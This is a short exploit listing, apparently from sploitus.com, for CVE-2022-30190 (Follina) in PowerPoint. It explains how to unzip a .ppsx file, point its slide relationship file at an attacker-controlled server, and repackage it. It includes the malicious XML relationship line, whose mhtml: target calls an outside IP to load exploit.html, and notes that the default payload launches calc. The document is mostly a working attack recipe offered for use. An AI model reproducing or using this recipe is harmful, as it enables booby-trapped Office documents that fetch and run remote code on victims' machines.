Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft CVE-2022-30190

## https://sploitus.com/exploit?id=E6B6EDFD-3B78-58CA-B507-093047F89BB1
# CVE-2022-30190_EXP_PowerPoint

This is exploit of CVE-2022-30190 on PowerPoint.



Modify the suffix of the file to 'zip' and unzip the file, you can edit `\ppt\slides\_rels\slide1.xml.rels` and replace to your vps ip:port like this, then compress them as the same way and change the suffix to 'ppsx'. The default payload in 'exploit.html' is to execute the `calc`.



```
<Relationship TargetMode="External" Id="rId3"  Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"  Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>
```



refer: https://github.com/chvancooten/follina.py